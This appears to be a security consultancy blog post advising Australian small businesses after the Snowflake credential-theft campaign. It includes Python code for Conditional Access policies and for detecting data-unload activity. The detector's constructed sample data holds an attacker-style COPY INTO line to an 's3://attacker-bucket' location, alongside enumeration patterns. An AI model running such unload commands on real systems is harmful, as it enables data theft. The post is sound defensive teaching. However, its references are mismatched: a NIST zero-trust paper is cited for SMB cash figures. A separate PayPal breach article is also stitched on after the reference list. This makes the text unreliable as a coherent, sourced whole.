TL;DR
The 2024 Snowflake customer exposure campaign hit roughly 165 organisations, including Ticketmaster (560 million records) and AT&T (109 million accounts), using nothing more sophisticated than stolen passwords on accounts without multi-factor authentication. Australian SMBs face the same blast radius today: credential-based intrusions drive 80% of cloud breaches, yet only 5% of SMBs have tested their recovery plans. Three controls you can implement this week, Conditional Access, Privileged Identity Management, and centralised log retention with monitoring, close the same entry points the attackers used against billion-dollar enterprises.
The Breach: What Happened
Beginning in April 2024, a financially motivated threat actor tracked by Mandiant as UNC5537 systematically compromised Snowflake customer tenants and exfiltrated hundreds of millions of records. Mandiant identified roughly 165 potentially exposed organisations, among them Ticketmaster, Santander Bank, AT&T and Advance Auto Parts [1].
This was not a zero-day. It was not a vulnerability in the Snowflake platform. The attackers bought credentials harvested by infostealer malware, some captured as far back as 2020, and simply logged in.
How They Got In
The kill chain was devastatingly simple:
- Initial access: Credentials harvested by infostealer malware (RedLine, Vidar, Raccoon) from contractor and employee machines were sold on dark-web marketplaces. Some credentials were years old but still valid.
- No MFA: None of the compromised Snowflake accounts had multi-factor authentication enabled, and the affected instances had no network allow list restricting where logins could come from, so a username and password from anywhere on the internet was enough for full access [1]. In several cases the accounts were service accounts never intended for interactive login, but nothing prevented it.
- Discovery and staging: Once inside, attackers used Snowflake's native SHOW, RESULT_SCAN and COPY INTO commands, all legitimate database operations, to enumerate tables and unload terabytes of data to stages for download. Because every command was legitimate, nothing in the platform blocked them.
- No detection: Victims typically learned of the intrusion weeks later, and often from Mandiant or Snowflake rather than from their own monitoring. Snowflake's query history recorded every command the attackers ran; nobody was reading it.
What It Cost
Mandiant identified hundreds of exposed customer credentials across the victim pool [1]. Ticketmaster alone lost 560 million customer records including partial payment card data [1]. The financial toll from regulatory fines, notification costs, class-action litigation and share-price impact ran into the billions across the victim set.
The wider picture has not improved since. Sophos reports that active ransomware groups grew 35% year-on-year, with 5,400 documented attacks in 2025, and Check Point's VP of Exposure Management notes that the window between a vulnerability becoming known and its exploitation has shrunk from 30 days to hours [3]. For an SMB the insolvency maths are stark: median Australian SMB cash reserves of $12,100 against an average cyber insurance claim of $264,000, a 22-to-1 gap [2].
Three Preventions Your SMB Can Implement This Week
Every entry point in the Snowflake campaign maps to a control an Australian SMB can switch on in its Microsoft 365, Google Workspace or AWS tenant today. If you run Snowflake itself, apply its own equivalents as well: an authentication policy that requires MFA and a network policy that limits logins to known addresses. Snowflake now enforces MFA by default for new human users, but existing accounts still need checking.
1. Conditional Access Policies
The attackers walked through an unlocked door. Conditional Access enforces context-aware authentication gates: if the sign-in originates from an unusual location, an unmanaged device, or a risky IP, access is blocked or challenged regardless of correct credentials.
- Implementation: In Entra ID (formerly Azure AD), create a policy requiring MFA for all users on all cloud apps, exclude at least one break-glass account so a misconfiguration cannot lock you out of the tenant, and create a second policy that blocks legacy authentication protocols (POP3, IMAP, SMTP AUTH) outright. Legacy clients cannot present an MFA claim, so a policy that merely requires MFA does nothing against them; the only effective grant control is block.
- Time required: Under 2 hours. Microsoft provides a "Report-only" mode to simulate impact before enforcement.
- What it stops: Credential stuffing, stolen password reuse, and the exact attack pattern used against Snowflake customers.
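As an added example, not code from the original post or from Microsoft, here is how those two policies look when created through the Microsoft Graph API instead of the portal. It assumes an access token carrying the Policy.ReadWrite.ConditionalAccess permission in the GRAPH_TOKEN environment variable and the object IDs of your emergency-access accounts, comma-separated, in BREAK_GLASS_IDS; the policy names CA001 and CA002 are arbitrary. Both policies are created in report-only mode, as the implementation note above recommends, and the script refuses to enforce a policy that has no break-glass exclusion.

```python
"""Create the two Conditional Access policies via Microsoft Graph, in report-only mode.
Needs an access token carrying Policy.ReadWrite.ConditionalAccess (app or delegated)."""
import json
import os
import urllib.request

GRAPH_CA = "https://graph.microsoft.com/v1.0/identity/conditionalAccess/policies"
# Report-only: the sign-in log shows what the policy *would* have done; nothing is enforced.
REPORT_ONLY = "enabledForReportingButNotEnforced"


def _conditions(break_glass_ids, client_app_types):
    """All users and all cloud apps, minus the emergency-access accounts.
    Excluding break-glass accounts is what keeps a bad policy from locking the tenant."""
    return {
        "users": {"includeUsers": ["All"], "excludeUsers": list(break_glass_ids)},
        "applications": {"includeApplications": ["All"]},
        "clientAppTypes": client_app_types,
    }


def mfa_policy(break_glass_ids, state=REPORT_ONLY):
    """Require MFA for every modern-auth sign-in (browser, modern desktop and mobile clients)."""
    return {
        "displayName": "CA001 Require MFA for all users",   # assumed name, pick your own
        "state": state,
        "conditions": _conditions(break_glass_ids, ["browser", "mobileAppsAndDesktopClients"]),
        "grantControls": {"operator": "OR", "builtInControls": ["mfa"]},
    }


def block_legacy_auth_policy(break_glass_ids, state=REPORT_ONLY):
    """Block legacy clients: Exchange ActiveSync and 'other' (POP3, IMAP, SMTP AUTH, older
    Office clients). They cannot present an MFA claim, so 'block' is the only grant
    control that has any effect on them."""
    return {
        "displayName": "CA002 Block legacy authentication",   # assumed name, pick your own
        "state": state,
        "conditions": _conditions(break_glass_ids, ["exchangeActiveSync", "other"]),
        "grantControls": {"operator": "OR", "builtInControls": ["block"]},
    }


def policy_is_safe(policy):
    """Pre-flight check: a policy may be enforced only if it excludes at least one account.
    Report-only policies are always safe to create."""
    excluded = policy["conditions"]["users"].get("excludeUsers", [])
    return policy["state"] == REPORT_ONLY or len(excluded) > 0


def create_policy(token, policy):
    """POST the policy to Graph and return the id of the created policy."""
    if not policy_is_safe(policy):
        raise ValueError(f"{policy['displayName']}: refusing to enforce without a break-glass exclusion")
    req = urllib.request.Request(
        GRAPH_CA, data=json.dumps(policy).encode("utf-8"), method="POST",
        headers={"Authorization": f"Bearer {token}", "Content-Type": "application/json"})
    with urllib.request.urlopen(req) as resp:
        return json.load(resp)["id"]


if __name__ == "__main__":
    token = os.environ["GRAPH_TOKEN"]                   # obtain with az or MSAL; not shown here
    glass = os.environ["BREAK_GLASS_IDS"].split(",")    # object IDs of emergency-access accounts
    for policy in (mfa_policy(glass), block_legacy_auth_policy(glass)):
        print(policy["displayName"], "->", create_policy(token, policy))
```

Leave both policies in report-only mode for a week or two and read the Conditional Access tab of the Entra sign-in log, which shows which sign-ins would have been challenged or blocked. Once the only blocked sign-ins are legacy clients you intended to retire, change the state to "enabled".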
2. Privileged Identity Management (PIM)
Service accounts and over-privileged users were the linchpin of UNC5537's success. PIM removes standing administrative privilege: access is granted just-in-time, for a limited duration, with approval workflows and full auditing.
- Implementation: In Entra ID, onboard Global Administrators, SharePoint Administrators, and Exchange Administrators into PIM. Set maximum activation time to 4 hours. Require MFA at activation time and, for critical roles, require approval from a second administrator [4].
- Time required: One business day.
- What it stops: Lateral movement by an attacker who compromises a single over-privileged account. Even with the password, the attacker cannot self-elevate to admin without completing MFA and, for critical roles, an approval chain. One caveat: PIM's "require MFA on activation" is satisfied by the MFA claim already on the user's session, so an attacker who has hijacked a live session through a stolen token or cookie can still activate. If you want a fresh challenge at the moment of elevation, bind activation to a Conditional Access authentication context and require a phishing-resistant method there.
3. Centralised Log Retention with Monitoring
The dwell time in the Snowflake campaign was weeks, not because logs didn't exist, but because nobody was looking. The ACSC Essential Eight Maturity Model requires, from Maturity Level Two upwards, that event logs be stored centrally, protected from unauthorised modification and deletion, and analysed in a timely manner to detect cyber security events [5]. Retaining at least 12 months of authentication and administrative activity is a sensible target on top of that: the Snowflake investigations had to look back months to establish when a stolen credential was first used.
- Implementation: For Microsoft 365 tenants, confirm the Unified Audit Log is enabled and ship it to a Log Analytics workspace or Microsoft Sentinel. For AWS, create a multi-region CloudTrail trail writing to an S3 bucket with a 12-month lifecycle rule and Object Lock, so an intruder cannot delete their own tracks; the console's built-in event history keeps only 90 days. For Google Workspace, the admin console keeps audit logs for roughly six months, so export them to BigQuery if you need longer retention.
- Time required: Under 3 hours to configure. Ongoing monitoring can start with Microsoft Sentinel's free data connectors (Office 365 audit logs are ingested at no charge) or a lightweight open-source SIEM such as Wazuh.
- What it stops: Undetected exfiltration. Even a basic alert rule such as "COPY INTO a stage or external cloud location" or "one user reading more than 5 GB in an hour" would have flagged the staging activity as it happened rather than weeks later.
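As an added example, not part of the original post and not UNC5537's tooling, here are the two alert rules above, plus a third for the SHOW-then-RESULT_SCAN enumeration pattern described earlier, written as a small Python rule engine and run over a handful of constructed QUERY_HISTORY-style records. The column names (QUERY_ID, SESSION_ID, USER_NAME, START_TIME, QUERY_TEXT, BYTES_SCANNED) follow SNOWFLAKE.ACCOUNT_USAGE.QUERY_HISTORY; in production you would pull those columns with a scheduled query and hand the rows to detect(). The sample rows, the 5 GB threshold and the one-hour window are assumptions for illustration.

```python
"""Three detections over Snowflake QUERY_HISTORY-style rows.
Rule 1 (unload):    COPY INTO <stage or cloud URL>, i.e. data being staged for download
Rule 2 (discovery): SHOW ... followed by RESULT_SCAN(LAST_QUERY_ID()) in the same session
Rule 3 (bulk_read): one user scanning more than THRESHOLD bytes inside any rolling hour
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

GB = 1024 ** 3
THRESHOLD = 5 * GB              # assumed; tune to the tenant's normal workload
WINDOW = timedelta(hours=1)

# COPY INTO followed by a stage reference (@...) or a quoted path is an *unload*.
# COPY INTO <table> FROM @stage is a load and must not match.
UNLOAD = re.compile(r"\bCOPY\s+INTO\s+(@\S+|'[^']*')", re.IGNORECASE)
CLOUD_URL = re.compile(r"^'(?:s3|azure|gcs)://", re.IGNORECASE)
SHOW = re.compile(r"^\s*SHOW\b", re.IGNORECASE)
RESULT_SCAN = re.compile(r"\bRESULT_SCAN\s*\(\s*LAST_QUERY_ID\s*\(", re.IGNORECASE)


def row(query_id, session_id, user, start, text, bytes_scanned):
    """Build one record using the QUERY_HISTORY column names referenced below."""
    return {"query_id": query_id, "session_id": session_id, "user_name": user,
            "start_time": datetime.fromisoformat(start), "query_text": text,
            "bytes_scanned": bytes_scanned}


# Constructed sample, not real telemetry. Session s1 is attacker-style activity
# (enumerate, read a customer table, unload it); s2 is an analyst doing normal work.
SAMPLE = [
    row("q1", "s1", "SVC_ETL", "2024-05-01T01:00:00", "SHOW TABLES IN ACCOUNT", 0),
    row("q2", "s1", "SVC_ETL", "2024-05-01T01:00:05",
        "SELECT * FROM TABLE(RESULT_SCAN(LAST_QUERY_ID()))", 10_000),
    row("q3", "s1", "SVC_ETL", "2024-05-01T01:10:00", "SELECT * FROM CUSTOMERS", 3 * GB),
    row("q4", "s1", "SVC_ETL", "2024-05-01T01:40:00",
        "COPY INTO @~/dump/ FROM (SELECT * FROM CUSTOMERS)", 3 * GB),
    row("q5", "s1", "SVC_ETL", "2024-05-01T03:00:00",
        "COPY INTO 's3://attacker-bucket/dump/' FROM ORDERS", 1 * GB),
    row("q6", "s2", "ANALYST", "2024-05-01T09:00:00",
        "COPY INTO CUSTOMERS FROM @ingest/customers.csv", 200_000_000),
    row("q7", "s2", "ANALYST", "2024-05-01T09:30:00", "SELECT COUNT(*) FROM ORDERS", 100_000_000),
]


def _alert(rule, severity, r, detail):
    return {"rule": rule, "severity": severity, "user": r["user_name"],
            "query_id": r["query_id"], "detail": detail}


def detect(rows, threshold=THRESHOLD, window=WINDOW):
    """Run all three rules over rows (any order) and return the alerts raised."""
    alerts = []
    last_in_session = {}             # session_id -> previous row, for rule 2
    recent = defaultdict(deque)      # user -> deque of (start_time, bytes) inside the window
    for r in sorted(rows, key=lambda x: x["start_time"]):
        text = r["query_text"]

        # Rule 1: any unload. A cloud URL is unambiguous; a stage name may be internal or
        # external, so it is medium until checked against SHOW STAGES.
        m = UNLOAD.search(text)
        if m:
            sev = "high" if CLOUD_URL.match(m.group(1)) else "medium"
            alerts.append(_alert("unload", sev, r, m.group(1)))

        # Rule 2: SHOW immediately followed by RESULT_SCAN(LAST_QUERY_ID()) is how metadata
        # is turned into a query-able result set during enumeration.
        prev = last_in_session.get(r["session_id"])
        if prev is not None and SHOW.match(prev["query_text"]) and RESULT_SCAN.search(text):
            alerts.append(_alert("discovery", "medium", r, prev["query_text"]))
        last_in_session[r["session_id"]] = r

        # Rule 3: rolling-window volume per user; clear after firing so one burst raises
        # one alert rather than one per subsequent query.
        q = recent[r["user_name"]]
        q.append((r["start_time"], r["bytes_scanned"]))
        while r["start_time"] - q[0][0] > window:
            q.popleft()
        total = sum(b for _, b in q)
        if total > threshold:
            alerts.append(_alert("bulk_read", "high", r, f"{total / GB:.1f} GB in {window}"))
            q.clear()
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE):
        print(f"[{a['severity']:6}] {a['rule']:10} {a['user']:8} {a['query_id']}  {a['detail']}")
```

On the sample, the analyst's load (q6) raises nothing because COPY INTO <table> is a load, not an unload; the attacker session raises a discovery alert on q2, a medium unload plus a 6 GB bulk-read alert on q4, and a high unload on q5 because the target is a cloud URL. Rule 3 uses BYTES_SCANNED as a cheap proxy for volume; if you unload to other regions or clouds, OUTBOUND_DATA_TRANSFER_BYTES in the same view is the more direct measure.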
FAQ
Q: My business uses Google Workspace, not Microsoft 365. Do these controls still apply?
A: Yes, with one gap. Google Workspace has Context-Aware Access (the equivalent of Conditional Access) and Workspace audit logs that can be exported to BigQuery for retention. It has no direct equivalent of PIM for Workspace admin roles; the substitute is to keep the number of super admins to two or three, give everyone else a pre-built or custom admin role scoped to what they actually do, and require security keys on the super admin accounts. If you run workloads on Google Cloud, its Privileged Access Manager provides just-in-time elevation for Cloud IAM roles. The principles are identical; only the product names and that one missing piece change.
Q: We're a 12-person shop. Is PIM overkill?
A: It is the opposite. Small organisations have the most to gain from PIM because a single compromised admin account — often the business owner's — grants total control. PIM protects that single point of failure without adding ongoing maintenance overhead.
Q: What's the single highest-impact thing we can do this afternoon?
A: Enable MFA on every account with administrative or financial privileges, then disable legacy authentication protocols. MFA alone would have blocked every intrusion Mandiant attributed to UNC5537, since none of the compromised accounts had it. Time required: 90 minutes.
Q: Do we need a full SIEM to make log retention useful?
A: No. Start with the vendor's native posture dashboard: Microsoft Secure Score, the Google Workspace Security health page, or AWS Security Hub (the first two are free; Security Hub charges per check). These surface the highest-risk misconfigurations without a dedicated SOC. They are posture tools rather than detection, though: they will tell you MFA is off, not that someone logged in from a new country last night, which is why the log retention step still matters.
Conclusion
The Snowflake campaign was not a sophisticated nation-state operation. It was a financially motivated group exploiting one of the oldest and most preventable misconfigurations in cybersecurity: accounts without multi-factor authentication. The same conditions exist in Australian SMB tenants today.
Check Point reports that one million machines are infected with infostealer malware daily, and the harvested credentials are on sale within hours [3]. The Sophos Threat Research Unit confirms that the era of LockBit-style "supergroups" has given way to a fluid ecosystem of smaller, faster-moving gangs: over 94 tracked groups across 124 countries [3]. Assume some of your credentials are already circulating.
This is not a problem that requires a SOC or a six-figure security budget. Conditional Access, Privileged Identity Management, and centralised log retention are included in the licences many SMBs already own.
Protect your cloud tenant this week. Visit consult.lil.business for a free cybersecurity posture assessment — we will review your Conditional Access policies, identity hygiene, and log retention in one session.
References
[1] Mandiant (Google Cloud). "UNC5537 Targets Snowflake Customer Instances for Data Theft and Extortion." June 2024.
[2] Rose, S., Borchert, O., Mitchell, S., and Connelly, S. NIST SP 800-207, "Zero Trust Architecture." NIST, August 2020.
[3] Sophos. "Ransomware in 2026: Newer Groups, Severe Impact." SMBtech.
[4] Microsoft Learn. "Microsoft Entra Privileged Identity Management documentation." Microsoft.
[5] Australian Cyber Security Centre (ACSC). "Essential Eight Maturity Model."
TL;DR (The Short Version)
- PayPal accidentally left a window open in their business loan app for 5 months — anyone who knew the right way to look could see your private data.
- Your name, phone, business address, Social Security number, and birthday may have been exposed.
- Some people had money taken from their accounts. PayPal gave refunds.
- You can get 2 years of free credit protection from PayPal — but you need to sign up before June 30, 2026.
- Four things you should do right now (they take 30 minutes, they're all free, and they make a real difference).
Let's Start With a Simple Analogy
Imagine your business keeps a filing cabinet with all its important documents — contracts, bank statements, your Social Security card. Now imagine a staff member accidentally propped the filing cabinet door open for 5 months without realising. Anyone who walked by could look inside.
That's basically what happened with PayPal's Working Capital loan app. It wasn't a dramatic movie-style hack. There was no sinister hacker who cracked a secret code. A programmer made a mistake in the software, and that mistake left a door open. PayPal found the open door on December 12, 2025, and closed it the next day. But it had been open since July 1, 2025 — that's 165 days.
What Is PayPal Working Capital?
PayPal Working Capital is a loan product that PayPal offers specifically to small businesses. If you sell things through PayPal and need cash quickly, you can borrow money and repay it through a portion of your future sales. It's popular with small business owners, online sellers, and sole traders.
The people affected by this breach are small business owners who applied for or used this loan product. Regular PayPal consumer accounts were not part of this specific breach.
What Information Was in That "Filing Cabinet"?
The exposed information included:
- Your full name and business address — straightforward to find anyway, but now confirmed accurate
- Your email address and phone number — this is how scammers will reach you next
- Your Social Security number (SSN) — this is the sensitive one. With an SSN plus your name and birthday, someone can pretend to be you and open credit accounts or file tax returns
- Your date of birth — the final piece of the identity puzzle
Think of your SSN + name + birthday as a master key to your financial identity. Individually, each piece is just information. Together, they're a key that opens doors you really don't want opened.
Did Anyone Actually Use This Information?
Yes — for a small group of customers. PayPal confirmed that some customers had unauthorised transactions on their accounts as a direct result of this breach. PayPal issued refunds to those people. PayPal also reset passwords for all affected accounts.
The Good News: PayPal Is Offering Free Protection
PayPal is offering 2 years of free credit monitoring through Equifax — one of the three major credit agencies in the US. This service:
- Watches all three credit bureaus (Equifax, Experian, TransUnion) for suspicious activity
- Scans the dark web for your Social Security number
- Sends alerts if anyone tries to open an account in your name
- Includes up to $1,000,000 in identity theft insurance
You need to enrol using the activation code from your breach notification letter before June 30, 2026. Check your email and mail for a letter from PayPal dated around February 10, 2026.
4 Things to Do Right Now (All Free, Takes 30 Minutes)
1. Sign up for the free credit monitoring. Use the Equifax activation code from PayPal's letter. This is free and adds a significant layer of protection.
2. Freeze your credit. This is the big one. A credit freeze tells the credit bureaus: "Don't let anyone open a new account in my name." It doesn't affect your existing accounts or credit score. You can freeze and unfreeze online whenever you need to. It's free by law. Do this at all three: Equifax.com, Experian.com, and TransUnion.com.
3. Check your PayPal account and your business credit profile. Look at your PayPal transaction history for any payments you didn't make. Also check your business credit via Dun & Bradstreet (dnb.com) — fraudsters sometimes target business credit, not just personal.
4. Be on alert for very convincing scam calls and emails. Scammers will now have your name, SSN, business address, and email. They will use this to sound like they already know you — because they do. Anyone calling and claiming to be PayPal, your bank, or the IRS who asks for a password or code is a scammer. Hang up. Call back on the official number from the website.
How to Keep Your Business Safe Going Forward
This breach happened because of a software mistake at PayPal — not because you did anything wrong. But it's a useful reminder that your business data lives in many places: your payment platform, your accounting software, your bank, your phone. Knowing what data is where — and what to do if one of those systems leaks — is exactly the kind of resilience that protects your business without requiring a big IT budget.
That's what lilMONSTER specialises in. We help small businesses understand their actual exposure, not just tick compliance boxes. A 30-minute conversation often reveals the gaps — and the fixes are usually simpler than you think.
Want to know what data your business is exposing through the platforms you use every day? Book a free consult with lilMONSTER →